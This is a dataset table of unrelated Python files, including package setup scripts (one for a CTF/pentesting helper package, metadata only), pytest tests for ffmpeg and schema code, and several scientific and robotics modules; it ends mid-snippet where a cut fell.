id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
1817679 | from setuptools import setup
# install localy:
# python3 -m pip install -e .
# This call to setup() does all the work
setup(
name="ctfpwn",
version="3.0.1",
description="Framework for making CTFs, bug bounty and pentesting Python scripting easier",
long_description="README.md",
long_description_content_type="text/markdown",
url="https://github.com/bl4de/ctfpwn",
author="<NAME> @bl4de",
author_email="<EMAIL>",
license="MIT",
packages=["ctfpwn"],
install_requires=["requests"]
)
| StarcoderdataPython |
6571373 | <filename>application/src/pytest/python/modules/notifications/schema_admin_test.py
from copy import copy
import pytest
from app import create_app
from config import Config
from modules.notifications.schema_admin import NotificationAdminSchema
from modules.notifications.model import Notification
from fixtures import Fixtures
@pytest.fixture
def app(request):
config = copy(Config)
config.TESTING = True
config.APP_TYPE = 'admin' if 'admin_api' in request.keywords else 'public'
app = create_app(config)
if 'unit' in request.keywords:
yield app
else:
fixtures = Fixtures(app)
fixtures.setup()
yield app
fixtures.teardown()
# INTEGRATION TESTS
@pytest.mark.integration
@pytest.mark.admin_api
def test_login_schema_dump(app):
notification = Notification.query.get(1)
result = NotificationAdminSchema().dump(notification)
assert len(result) == 13
assert result['id'] == 1
assert result['user']['id'] == 1
assert result['user']['username'] == 'user1'
assert result['user']['uri'] == 'http://localhost/user/1'
assert result['channel'] == 1
assert result['template'] == 'template-1'
assert result['service'] == 'Service 1'
assert result['notification_id'] == '123456'
assert result['accepted'] == 1
assert result['rejected'] == 0
assert result['sent_at'] == '2019-02-01T10:45:00+0000'
assert result['status'] == 1
assert result['status_changed_at'] == '2019-02-03T00:00:00+0000'
assert result['created_at'] == '2019-02-01T00:00:00+0000'
assert result['updated_at'] == '2019-02-02T00:00:00+0000'
| StarcoderdataPython |
3305170 | <reponame>welfare-state-analytics/pyriksprot
from __future__ import annotations
import sqlite3
from contextlib import nullcontext
from functools import cached_property
import pandas as pd
from . import utility as mdu
DATA_TABLES: dict[str, str] = {
'protocols': 'document_id',
'utterances': 'u_id',
'unknown_utterance_gender': 'u_id',
'unknown_utterance_party': 'u_id',
}
null_frame: pd.DataFrame = pd.DataFrame()
class UtteranceIndex:
def __init__(self):
self.protocols: pd.DataFrame = null_frame
self.utterances: pd.DataFrame = null_frame
self.unknown_utterance_gender: pd.DataFrame = null_frame
self.unknown_utterance_party: pd.DataFrame = null_frame
def load(self, source: str | sqlite3.Connection | dict) -> UtteranceIndex:
with (sqlite3.connect(database=source) if isinstance(source, str) else nullcontext(source)) as db:
tables: dict[str, pd.DataFrame] = mdu.load_tables(DATA_TABLES, db=db)
for table_name, table in tables.items():
setattr(self, table_name, table)
return self
@cached_property
def unknown_party_lookup(self) -> dict[str, int]:
"""Utterance `u_id` to `party_id` mapping"""
return self.unknown_utterance_party['party_id'].to_dict()
@cached_property
def unknown_gender_lookup(self) -> dict[str, int]:
"""Utterance `u_id` to `gender_id` mapping"""
return self.unknown_utterance_gender['gender_id'].to_dict()
def protocol(self, document_id: int) -> pd.Series:
return self.protocols.loc[document_id]
| StarcoderdataPython |
4981477 | namelist = 'wav', 'mp3'
| StarcoderdataPython |
1926845 | <reponame>mudkipmaster/gwlf-e
from gwlfe.AFOS.GrazingAnimals.Losses.GRStreamN import AvGRStreamN
from gwlfe.AFOS.GrazingAnimals.Losses.GRStreamN import AvGRStreamN_f
def NFENCING(PctStreams, PctGrazing, GrazingAnimal_0, NumAnimals, AvgAnimalWt, AnimalDailyN, n42, n45, n69):
grsn = AvGRStreamN(PctStreams, PctGrazing, GrazingAnimal_0, NumAnimals, AvgAnimalWt, AnimalDailyN)
if n42 > 0: # based on the code, n42 is always > 0 (may not need to check
result = (n45 / n42) * n69 * grsn
else:
result = 0 # TODO: the code does not have this fall back, would have error if n42 <= 0
return result
def NFENCING_f(PctStreams, PctGrazing, GrazingAnimal_0, NumAnimals, AvgAnimalWt, AnimalDailyN, n42, n45, n69):
if n42 > 0: # based on the code, n42 is always > 0 (may not need to check
grsn = AvGRStreamN_f(PctStreams, PctGrazing, GrazingAnimal_0, NumAnimals, AvgAnimalWt, AnimalDailyN)
return (n45 / n42) * n69 * grsn
else:
return 0 # TODO: the code does not have this fall back, would have error if n42 <= 0
| StarcoderdataPython |
9672342 | <reponame>ayoubBouziane/TrainingSpeech<gh_stars>1-10
import os
import pytest
from training_speech import ffmpeg
CURRENT_DIR = os.path.dirname(__file__)
@pytest.mark.parametrize('kwargs, expected_call', [
(dict(from_='foo.mp3', to='foo.wav'), 'ffmpeg -y -i foo.mp3 -loglevel quiet foo.wav'),
(dict(from_='foo.mp3', to='foo.wav', rate=16000, channels=1), 'ffmpeg -y -i foo.mp3 -ar 16000 -ac 1 -loglevel quiet foo.wav'),
])
def test_convert(kwargs, expected_call, mocker):
call_mock = mocker.patch('subprocess.call', return_value=0)
ffmpeg.convert(**kwargs)
assert call_mock.call_count == 1
call_args, call_kwargs = call_mock.call_args
assert ' '.join(call_args[0]) == expected_call
@pytest.mark.parametrize('kwargs, expected_call', [
(
dict(input_path='input.wav', output_path='output.wav', from_=1, to=10),
'sox input.wav output.wav trim 1 9',
),
(
dict(input_path='input.wav', output_path='output.wav', from_=1),
'ffmpeg -y -i input.wav -ss 1 -loglevel quiet -c copy output.wav',
),
(
dict(input_path='input.wav', output_path='output.wav', to=10),
'ffmpeg -y -i input.wav -to 10 -loglevel quiet -c copy output.wav',
),
])
def test_cut(kwargs, expected_call, mocker):
call_mock = mocker.patch('subprocess.call', return_value=0)
ffmpeg.cut(**kwargs)
assert call_mock.call_count == 1
call_args, call_kwargs = call_mock.call_args
assert ' '.join(call_args[0]) == expected_call
@pytest.mark.parametrize('input_file, noise_level, min_duration, expected_silences', [
('test.wav', -50, 0.05, [(0, 0.178), (1.024, 1.458), (2.048, 2.61), (3.072, 4.864)]),
('silence.wav', -50, 0.05, [(0.0, 1.108)]),
('silence.mp3', -50, 0.05, [(0.0, 1.108)]),
('silence2.wav', -50, 0.05, [(0.462, 0.896), (0.974, 2.0)]),
('silence3.wav', -45, 0.07, [(0.0, 0.454), (1.21, 1.467)]),
])
def test_list_silences(input_file, noise_level, min_duration, expected_silences):
path_to_wav = os.path.join(CURRENT_DIR, f'./assets/{input_file}')
silences = ffmpeg.list_silences(path_to_wav, noise_level=noise_level, min_duration=min_duration, force=True)
assert expected_silences == silences
def test_audio_duration():
path_to_wav = os.path.join(CURRENT_DIR, './assets/test.wav')
assert ffmpeg.audio_duration(path_to_wav) == 4.864
| StarcoderdataPython |
9618483 | """
Simple, non parallel optimization set up example.
"""
import sys,os
sys.path.insert(0,'../../../')
from glennopt.helpers import mutation_parameters, de_mutation_type, parallel_settings
from glennopt.base import Parameter
from glennopt.optimizers import NSGA3
from glennopt.DOE import FullFactorial, CCD, LatinHyperCube, Default
# Generate the DOE
current_dir = os.getcwd()
pop_size = 32
ns = NSGA3(eval_command = "python evaluation.py", eval_folder="Evaluation",pop_size=pop_size,optimization_folder=current_dir)
doe = LatinHyperCube(128)
doe.add_parameter(name="x1",min_value=-5,max_value=5)
doe.add_parameter(name="x2",min_value=-5,max_value=5)
doe.add_parameter(name="x3",min_value=-5,max_value=5)
ns.add_eval_parameters(eval_params=doe.eval_parameters) # Add the evaluation parameters from doe to NSGA3
doe.add_objectives(name='objective1')
doe.add_objectives(name='objective2')
ns.add_objectives(objectives=doe.objectives)
# No performance Parameters
doe.add_perf_parameter(name='p1')
doe.add_perf_parameter(name='p2')
doe.add_perf_parameter(name='p3')
ns.add_performance_parameters(performance_params = doe.perf_parameters)
# Mutation settings
ns.mutation_params.mutation_type = de_mutation_type.de_rand_1_bin
ns.mutation_params.F = 0.4
ns.mutation_params.C = 0.7
# Parallel settings
p = parallel_settings()
p.concurrent_executions = 10
p.cores_per_execution = 2
p.execution_timeout = 1 # minutes
p.machine_filename = 'machinefile.txt'
ns.parallel_settings = p
ns.start_doe(doe.generate_doe())
ns.optimize_from_population(pop_start=-1,n_generations=50)
| StarcoderdataPython |
4915742 | <gh_stars>0
import cv2
## TEST
# Initializing the Histograms of Oriented Gradients person detector
hog = cv2.HOGDescriptor()
hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())
cap = cv2.VideoCapture("test_assets/test2.mp4")
while cap.isOpened():
# Reading the video stream
ret, image = cap.read()
if ret:
# resizing for better performance but it reduces frame rate
#image = imutils.resize(image, width=min(400, image.shape[1]))
# Detecting on grayscale image is faster.
gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)
# Detecting all the regions in the Image that has a human inside it
(regions, _) = hog.detectMultiScale(gray, winStride=(4, 4), padding=(4, 4), scale=1.05)
# Drawing the regions in the coloured image
for (x, y, w, h) in regions:
cv2.rectangle(image, (x, y), (x + w, y + h), (0, 0, 255), 1)
# Showing the output Image
cv2.imshow("Output", image)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
cap.release()
cv2.destroyAllWindows() | StarcoderdataPython |
40569 | # Copyright (c) 2020 Samplasion <<EMAIL>>
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
TARGET = 2020
def main():
print("=============")
print("= AoC Day 1 =")
print("=============")
print()
with open("input.txt") as f:
file = f.read()
numbers = sorted(list(map(int, file.split("\n"))))
phase1(numbers)
phase2(numbers)
def phase1(numbers):
min = 0
max = -1
number = numbers[min] + numbers[max]
while number != TARGET:
if number > TARGET:
max -= 1
else:
min += 1
number = numbers[min] + numbers[max]
# else: print("There's no pair of numbers that amounts to {}".format(TARGET))
print(f"[Part 1] {numbers[min]} and {numbers[max]} are the numbers that amount to {TARGET}. " +
f"Their product is {numbers[min]*numbers[max]}")
def phase2(numbers):
for i in numbers:
for j in numbers:
for k in numbers:
if i + j + k == TARGET:
print(f"[Part 2] {i}, {j} and {k} are the numbers that amount to {TARGET}. " +
f"Their product is {i*j*k}")
return
print(f"There's no group of 3 numbers that sums to {TARGET}.")
if __name__ == '__main__':
main() | StarcoderdataPython |
3403583 | <reponame>tfwcn/Mask_RCNN
import os
import argparse
import re
parser = argparse.ArgumentParser()
parser.add_argument("images_dir")
args = parser.parse_args()
index = 0
for file_name in os.listdir(args.images_dir):
full_path = os.path.join(args.images_dir, file_name)
if os.path.isfile(full_path):
# 正则,re.I忽略大小写
match_pattern = r"^(img \([0-9]+\))(\.[0-9a-z]+)$"
matchObj = re.match(match_pattern, file_name, re.I)
# print("matchObj", matchObj)
# 找到未重命名的文件
if matchObj == None:
print("file_name", file_name)
# 生成新文件名,跳过已存在的名称
new_name = "img ({0})".format(index)
# 用于标记新文件名是否存在
is_new = False
while is_new == False:
is_new = True
for file_name2 in os.listdir(args.images_dir):
matchObj2 = re.match(match_pattern, file_name2, re.I)
# 名称重复
if matchObj2 != None and matchObj2.group(1) == new_name:
index += 1
new_name = "img ({0})".format(index)
is_new = False
break
# 加上后缀
match_pattern3 = r"^(.+)(\.[0-9a-z]+)$"
matchObj3 = re.match(match_pattern3, file_name, re.I)
new_name = "{0}{1}".format(new_name, matchObj3.group(2))
print("new_name", new_name)
new_full_path = os.path.join(args.images_dir, new_name)
os.rename(full_path, new_full_path)
index += 1
| StarcoderdataPython |
1691529 | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from dataclasses import dataclass
from fairseq.dataclass import FairseqDataclass
from fairseq.optim.lr_scheduler import FairseqLRScheduler, register_lr_scheduler
@dataclass
class PassThroughScheduleConfig(FairseqDataclass):
pass
@register_lr_scheduler("pass_through", dataclass=PassThroughScheduleConfig)
class PassThroughScheduleSchedule(FairseqLRScheduler):
"""Delegate lr scheduling to the optimizer."""
def __init__(self, cfg: PassThroughScheduleConfig, optimizer):
super().__init__(cfg, optimizer)
assert (
hasattr(optimizer, "lr_scheduler") and optimizer.lr_scheduler is not None
), "Pass-through schedule can only be used with optimizers with their own schedulers"
def state_dict(self):
return self.optimizer.lr_scheduler.state_dict()
def load_state_dict(self, state_dict):
self.optimizer.lr_scheduler.load_state_dict(state_dict)
def step_begin_epoch(self, epoch):
"""Update the learning rate at the beginning of the given epoch."""
return self.optimizer.lr_scheduler.step_begin_epoch(epoch)
def step_update(self, num_updates):
"""Update the learning rate after each update."""
return self.optimizer.lr_scheduler.step_update(num_updates)
| StarcoderdataPython |
3436725 | # -*- coding: utf-8 -*-
# Copyright CERN since 2012
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import glob
import os
import shutil
import sys
from setuptools import setup, find_packages
if sys.version_info < (3, 6):
print('ERROR: Rucio Server requires at least Python 3.6 to run.')
sys.exit(1)
try:
from setuputil import server_requirements_table, match_define_requirements, get_rucio_version
except ImportError:
sys.path.append(os.path.abspath(os.path.dirname(__file__)))
from setuputil import server_requirements_table, match_define_requirements, get_rucio_version
install_requires, extras_require = match_define_requirements(server_requirements_table)
name = 'rucio'
packages = find_packages(where='lib')
description = "Rucio Package"
data_files = [
('rucio/', ['requirements.txt']),
('rucio/etc/', glob.glob('etc/*.template')),
('rucio/etc/web', glob.glob('etc/web/*.template')),
('rucio/tools/', ['tools/bootstrap.py', 'tools/reset_database.py', 'tools/merge_rucio_configs.py']),
('rucio/etc/mail_templates/', glob.glob('etc/mail_templates/*.tmpl')),
]
scripts = glob.glob('bin/rucio*')
if os.path.exists('build/'):
shutil.rmtree('build/')
if os.path.exists('lib/rucio_clients.egg-info/'):
shutil.rmtree('lib/rucio_clients.egg-info/')
if os.path.exists('lib/rucio.egg-info/'):
shutil.rmtree('lib/rucio.egg-info/')
setup(
name=name,
version=get_rucio_version(),
packages=packages,
package_dir={'': 'lib'},
data_files=data_files,
include_package_data=True,
scripts=scripts,
author="Rucio",
author_email="<EMAIL>",
description=description,
license="Apache License, Version 2.0",
url="https://rucio.cern.ch/",
python_requires=">=3.6, <4",
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: Apache Software License',
'Intended Audience :: Information Technology',
'Intended Audience :: System Administrators',
'Operating System :: POSIX :: Linux',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Environment :: No Input/Output (Daemon)', ],
install_requires=install_requires,
extras_require=extras_require,
)
| StarcoderdataPython |
6644395 | # coding: utf-8
from .analyze import CZSC, CzscTrader
from .utils.ta import SMA, EMA, MACD, KDJ
from .data.jq import JqCzscTrader
from . import aphorism
__version__ = "0.7.8"
__author__ = "zengbin93"
__email__ = "<EMAIL>"
__date__ = "20210925"
print(f"欢迎使用CZSC!当前版本标识为 {__version__}@{__date__}\n")
aphorism.print_one()
| StarcoderdataPython |
8018110 | # 公用配置
DEBUG = True
SQLALCHEMY_ECHO = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
SQLALCHEMY_ENCODING = "utf8mb4"
SECRET_KEY = "root"
| StarcoderdataPython |
5187519 | from datapackage_pipelines_knesset.common.base_processors.base_resource import BaseResourceProcessor
class AddResourceBaseProcessor(BaseResourceProcessor):
def _get_new_resource_descriptor(self):
# you can use this to add attributes (other then schema / path / name - which are added automatically)
return {}
def _get_new_resource(self):
# should yield the new resource rows
# the rows will be processed further via the standard filter_resources / filter_resource / filter_ros methods
yield from []
def _is_matching_resource_number(self, resource_number, resource_descriptor=None):
# no matching needed, we append the resource
return False
def _filter_resource_descriptors(self, resource_descriptors):
descriptors = super(AddResourceBaseProcessor, self)._filter_resource_descriptors(resource_descriptors)
# append the new resource descriptor
self._resource_number = len(descriptors)
descriptors.append(self._filter_resource_descriptor(self._resource_number, self._get_new_resource_descriptor()))
return descriptors
def _filter_resources(self, resources):
yield from super(AddResourceBaseProcessor, self)._filter_resources(resources)
yield self._filter_resource(self._resource_number, self._get_new_resource())
| StarcoderdataPython |
12826091 | # -*- coding: utf-8 -*-
from zmq.eventloop.zmqstream import ZMQStream
from zmq import Context,PULL,PUSH
from program_top.utilities.ip_and_socket import get_local_ip
from program_top.components import component_base
class zmq_listen_connection(object):
'''zmq监听连接'''
def __init__(self,port_number,callback_function):
'''
端口号
指定处理消息回调函数,消息作为入参
'''
super(zmq_listen_connection, self).__init__()
self.__context=Context()
self.__socket=self.__context.socket(PULL)
self.__socket.bind("tcp://0.0.0.0:%d"%(port_number))
self.__stream_pull=ZMQStream(self.__socket)
self.__stream_pull.on_recv(callback_function)
pass
pass
class zmq_send_connection(object):
'''zmq发送连接'''
def __init__(self):
self.__context=Context()
self.__socket=self.__context.socket(PUSH)
self.__current_connection=None
def connect(self,target_address,target_port):
self.__socket.connect("tcp://%s:%d"%(target_address, target_port))
pass
def dis_connect(self, target_address, target_port):
self.__socket.disconnect("tcp://%s:%d"%(target_address, target_port))
pass
def send(self,json_content):
self.__socket.send_json(json_content)
pass
pass
class zmq_io_gateway(component_base):
'''
zmq网络模块的入口和出口
'''
def __init__(self,in_port,callback_entrance=None,binding_instance=None):
'''指定输入端口号,整数
指定回调函数入口
指定持有这个端口的实例
'''
super(zmq_io_gateway, self).__init__(binding_instance)
self.sender=zmq_send_connection()
platform_category=binding_instance._environment_pack['current_platform_info']['current_system_category']
self.lan_ip=get_local_ip(platform_category)
if callback_entrance:
self.listener=zmq_listen_connection(in_port,callback_entrance)
pass
pass | StarcoderdataPython |
6469527 | /Users/NikhilArora/anaconda3/lib/python3.6/re.py | StarcoderdataPython |
5081016 | <reponame>duykienvp/sigspatial-2020-spatial-privacy-pricing
import numpy
from scipy.stats import rv_continuous
from pup.algorithms import util
from pup.common.checkin import Checkin
from pup.common.grid import Grid
from pup.common.rectangle import Rectangle
class NoisyCheckin(Checkin):
""" Noisy version of a check-in. The exact location information is removed.
The exact location information include: lat, lon, location_id, x, y
Attributes
----------
noise_level: float
noise level used for this noisy check-in
rv_x: rv_continuous
continuous random variable representing the distribution of this noisy data over x dimension
rv_y: rv_continuous
continuous random variable representing the distribution of this noisy data over y dimension
"""
def __init__(self, c: Checkin, noise_level: float, rv_x: rv_continuous, rv_y: rv_continuous):
""" Initialize a checkin with given values from datasets.
Parameters
----------
c: Checkin
the check-in to inherit data from
noise_level: float
noise level used for this noisy check-in
rv_x: rv_continuous
continuous random variable representing the distribution of this noisy data over x dimension
rv_y: rv_continuous
continuous random variable representing the distribution of this noisy data over y dimension
"""
super().__init__(c.c_id, c.user_id, c.timestamp, c.datetime, c.lat, c.lon, c.location_id)
# exact location information is removed
self.lat = None
self.lon = None
self.location_id = None
self.x = None
self.y = None
# noise information
self.rv_x = rv_x
self.rv_y = rv_y
self.noise_level = noise_level
def __str__(self):
return "Checkin(user_id={user_id}, timestamp={timestamp}, datetime={datetime}, " \
"lat={lat}, lon={lon}, location_id={location_id}, x={x}, y={y}, " \
"rv_x={rv_x}, rv_y={rv_y}, noise_level={noise_level})".format(**vars(self))
def cal_prob_inside_rect(self, rect: Rectangle) -> float:
""" Calculate the probability that the original check-in of this noisy check-in is inside a rectangle
Parameters
----------
rect
rectangle of interest
Returns
-------
float
the probability that the original check-in of this noisy check-in is inside a rectangle
"""
return util.cal_prob_inside_rect(rect, self.rv_x, self.rv_y)
def cal_prob_grid(self, grid: Grid) -> numpy.ndarray:
""" Calculate probability of being inside each of cell of the grid
Parameters
----------
grid
the grid
Returns
-------
ndarray
the array of probabilities for each grid cell
"""
max_x_idx, max_y_idx = grid.get_shape()
# calculate cdf for each line in x dimension
x_cdf = list()
for x in range(max_x_idx + 1):
cell_x = x * grid.cell_len_x + grid.min_x
x_cdf.append(self.rv_x.cdf(cell_x))
# calculate cdf for each line in y dimension
y_cdf = list()
for y in range(max_y_idx + 1):
cell_y = y * grid.cell_len_y + grid.min_y
y_cdf.append(self.rv_y.cdf(cell_y))
# calculate the probability for each cell
probs = numpy.zeros((max_x_idx, max_y_idx))
# prob_inside_domain = self.cal_prob_inside_rect(grid)
for x in range(max_x_idx):
for y in range(max_y_idx):
prob_x = x_cdf[x] - x_cdf[x + 1]
prob_y = y_cdf[y] - y_cdf[y + 1]
prob = prob_x * prob_y
# probs[x, y] = prob / prob_inside_domain
probs[x, y] = prob
return probs
| StarcoderdataPython |
9756734 | # Copyright 2020 DeepMind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Composer entities corresponding to game boards."""
import copy
import os
from dm_control import composer
from dm_control import mjcf
import numpy as np
from dm_control.utils import io as resources
_TOUCH_THRESHOLD = 1e-3 # Activation threshold for touch sensors (N).
# whether to display underlying sensors for Goboard (useful to align texture)
_SHOW_DEBUG_GRID = False
_TEXTURE_PATH = os.path.join(os.path.dirname(__file__), 'goboard_7x7.png')
def _make_checkerboard(rows,
columns,
square_halfwidth,
height=0.01,
sensor_size=0.7,
name='checkerboard'):
"""Builds a checkerboard with touch sensors centered on each square."""
root = mjcf.RootElement(model=name)
black_mat = root.asset.add('material', name='black', rgba=(0.2, 0.2, 0.2, 1))
white_mat = root.asset.add('material', name='white', rgba=(0.8, 0.8, 0.8, 1))
sensor_mat = root.asset.add('material', name='sensor', rgba=(0, 1, 0, 0.3))
root.default.geom.set_attributes(
type='box', size=(square_halfwidth, square_halfwidth, height))
root.default.site.set_attributes(
type='box',
size=(sensor_size * square_halfwidth,) * 2 + (0.5 * height,),
material=sensor_mat, group=composer.SENSOR_SITES_GROUP)
xpos = (np.arange(columns) - 0.5*(columns - 1)) * 2 * square_halfwidth
ypos = (np.arange(rows) - 0.5*(rows - 1)) * 2 * square_halfwidth
geoms = []
touch_sensors = []
for i in range(rows):
for j in range(columns):
geom_mat = black_mat if ((i % 2) == (j % 2)) else white_mat
name = '{}_{}'.format(i, j)
geoms.append(
root.worldbody.add(
'geom',
pos=(xpos[j], ypos[i], height),
name=name,
material=geom_mat))
site = root.worldbody.add('site', pos=(xpos[j], ypos[i], 2*height),
name=name)
touch_sensors.append(root.sensor.add('touch', site=site, name=name))
return root, geoms, touch_sensors
def _make_goboard(boardsize,
square_halfwidth,
height=0.01,
sensor_size=0.7,
name='goboard'):
"""Builds a Go with touch sensors centered on each intersection."""
y_offset = -0.08
rows = boardsize
columns = boardsize
root = mjcf.RootElement(model=name)
if _SHOW_DEBUG_GRID:
black_mat = root.asset.add('material', name='black',
rgba=(0.2, 0.2, 0.2, 0.5))
white_mat = root.asset.add('material', name='white',
rgba=(0.8, 0.8, 0.8, 0.5))
else:
transparent_mat = root.asset.add('material', name='intersection',
rgba=(0, 1, 0, 0.0))
sensor_mat = root.asset.add('material', name='sensor', rgba=(0, 1, 0, 0.3))
contents = resources.GetResource(_TEXTURE_PATH)
root.asset.add('texture', name='goboard', type='2d',
file=mjcf.Asset(contents, '.png'))
board_mat = root.asset.add(
'material', name='goboard', texture='goboard',
texrepeat=[0.97, 0.97])
root.default.geom.set_attributes(
type='box', size=(square_halfwidth, square_halfwidth, height))
root.default.site.set_attributes(
type='box',
size=(sensor_size * square_halfwidth,) * 2 + (0.5 * height,),
material=sensor_mat, group=composer.SENSOR_SITES_GROUP)
board_height = height
if _SHOW_DEBUG_GRID:
board_height = 0.5*height
root.worldbody.add(
'geom',
pos=(0, 0+y_offset, height),
type='box',
size=(square_halfwidth * boardsize,) * 2 + (board_height,),
name=name,
material=board_mat)
xpos = (np.arange(columns) - 0.5*(columns - 1)) * 2 * square_halfwidth
ypos = (np.arange(rows) - 0.5*(rows - 1)) * 2 * square_halfwidth + y_offset
geoms = []
touch_sensors = []
for i in range(rows):
for j in range(columns):
name = '{}_{}'.format(i, j)
if _SHOW_DEBUG_GRID:
transparent_mat = black_mat if ((i % 2) == (j % 2)) else white_mat
geoms.append(
root.worldbody.add(
'geom',
pos=(xpos[j], ypos[i], height),
name=name,
material=transparent_mat))
site = root.worldbody.add('site', pos=(xpos[j], ypos[i], 2*height),
name=name)
touch_sensors.append(root.sensor.add('touch', site=site, name=name))
pass_geom = root.worldbody.add(
'geom',
pos=(0, y_offset, 0.0),
size=(square_halfwidth*boardsize*2,
square_halfwidth*boardsize) + (0.5 * height,),
name='pass',
material=transparent_mat)
site = root.worldbody.add('site', pos=(0, y_offset, 0.0),
size=(square_halfwidth*boardsize*2,
square_halfwidth*boardsize) + (0.5 * height,),
name='pass')
pass_sensor = root.sensor.add('touch', site=site, name='pass')
return root, geoms, touch_sensors, pass_geom, pass_sensor
class CheckerBoard(composer.Entity):
"""An entity representing a checkerboard."""
def __init__(self, *args, **kwargs):
super(CheckerBoard, self).__init__(*args, **kwargs)
self._contact_from_before_substep = None
def _build(self, rows=3, columns=3, square_halfwidth=0.05):
"""Builds a `CheckerBoard` entity.
Args:
rows: Integer, the number of rows.
columns: Integer, the number of columns.
square_halfwidth: Float, the halfwidth of the squares on the board.
"""
root, geoms, touch_sensors = _make_checkerboard(
rows=rows, columns=columns, square_halfwidth=square_halfwidth)
self._mjcf_model = root
self._geoms = np.array(geoms).reshape(rows, columns)
self._touch_sensors = np.array(touch_sensors).reshape(rows, columns)
@property
def mjcf_model(self):
return self._mjcf_model
def before_substep(self, physics, random_state):
del random_state # Unused.
# Cache a copy of the array of active contacts before each substep.
self._contact_from_before_substep = [
copy.copy(c) for c in physics.data.contact
]
def validate_finger_touch(self, physics, row, col, hand):
# Geom for the board square
geom_id = physics.bind(self._geoms[row, col]).element_id
# finger geoms
finger_geoms_ids = set(physics.bind(hand.finger_geoms).element_id)
contacts = self._contact_from_before_substep
set1, set2 = set([geom_id]), finger_geoms_ids
for contact in contacts:
finger_tile_contact = ((contact.geom1 in set1 and
contact.geom2 in set2) or
(contact.geom1 in set2 and contact.geom2 in set1))
if finger_tile_contact:
return True
return False
def get_contact_pos(self, physics, row, col):
geom_id = physics.bind(self._geoms[row, col]).element_id
# Here we use the array of active contacts from the previous substep, rather
# than the current values in `physics.data.contact`. This is because we use
# touch sensors to detect when a square on the board is being pressed, and
# the pressure readings are based on forces that were calculated at the end
# of the previous substep. It's possible that `physics.data.contact` no
# longer contains any active contacts involving the board geoms, even though
# the touch sensors are telling us that one of the squares on the board is
# being pressed.
contacts = self._contact_from_before_substep
relevant_contacts = [
c for c in contacts if c.geom1 == geom_id or c.geom2 == geom_id
]
if relevant_contacts:
# If there are multiple contacts involving this square of the board, just
# pick the first one.
return relevant_contacts[0].pos.copy()
else:
print("Touch sensor at ({},{}) doesn't have any active contacts!".format(
row, col))
return False
def get_contact_indices(self, physics):
pressures = physics.bind(self._touch_sensors.ravel()).sensordata
# If any of the touch sensors exceed the threshold, return the (row, col)
# indices of the most strongly activated sensor.
if np.any(pressures > _TOUCH_THRESHOLD):
return np.unravel_index(np.argmax(pressures), self._touch_sensors.shape)
else:
return None
def sample_pos_inside_touch_sensor(self, physics, random_state, row, col):
bound_site = physics.bind(self._touch_sensors[row, col].site)
jitter = bound_site.size * np.array([1., 1., 0.])
return bound_site.xpos + random_state.uniform(-jitter, jitter)
class GoBoard(CheckerBoard):
"""An entity representing a Goboard."""
def _build(self, boardsize=7, square_halfwidth=0.05):
"""Builds a `GoBoard` entity.
Args:
boardsize: Integer, the size of the board (boardsize x boardsize).
square_halfwidth: Float, the halfwidth of the squares on the board.
"""
if boardsize != 7:
raise ValueError('Only boardsize of 7x7 is implemented at the moment')
root, geoms, touch_sensors, pass_geom, pass_sensor = _make_goboard(
boardsize=boardsize, square_halfwidth=square_halfwidth)
self._mjcf_model = root
self._geoms = np.array(geoms).reshape(boardsize, boardsize)
self._touch_sensors = np.array(touch_sensors).reshape(boardsize, boardsize)
self._pass_geom = pass_geom
self._pass_sensor = pass_sensor
def get_contact_indices(self, physics):
pressures = physics.bind(self._touch_sensors.ravel()).sensordata
# Deal with pass first
pass_pressure = physics.bind(self._pass_sensor).sensordata
if pass_pressure > np.max(pressures) and pass_pressure > _TOUCH_THRESHOLD:
return -1, -1
# If any of the other touch sensors exceed the threshold, return the
# (row, col) indices of the most strongly activated sensor.
if np.any(pressures > _TOUCH_THRESHOLD):
return np.unravel_index(np.argmax(pressures), self._touch_sensors.shape)
else:
return None
def validate_finger_touch(self, physics, row, col, hand):
# Geom for the board square
if row == -1 and col == -1:
geom_id = physics.bind(self._pass_geom).element_id
else:
geom_id = physics.bind(self._geoms[row, col]).element_id
# finger geoms
finger_geoms_ids = set(physics.bind(hand.finger_geoms).element_id)
contacts = self._contact_from_before_substep
set1, set2 = set([geom_id]), finger_geoms_ids
for contact in contacts:
finger_tile_contact = ((contact.geom1 in set1 and
contact.geom2 in set2) or
(contact.geom1 in set2 and contact.geom2 in set1))
if finger_tile_contact:
return True
return False
def sample_pos_inside_touch_sensor(self, physics, random_state, row, col):
bound_site = physics.bind(self._touch_sensors[row, col].site)
jitter = bound_site.size * np.array([0.25, 0.25, 0.])
return bound_site.xpos + random_state.uniform(-jitter, jitter)
| StarcoderdataPython |
8069052 | import numpy as np
import scipy.sparse as sp
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn.init import xavier_uniform_
device = 'cuda' if torch.cuda.is_available() else 'cpu'
def normt_spm(mx, method='in'):
if method == 'in':
mx = mx.transpose()
rowsum = np.array(mx.sum(1))
r_inv = np.power(rowsum, -1).flatten()
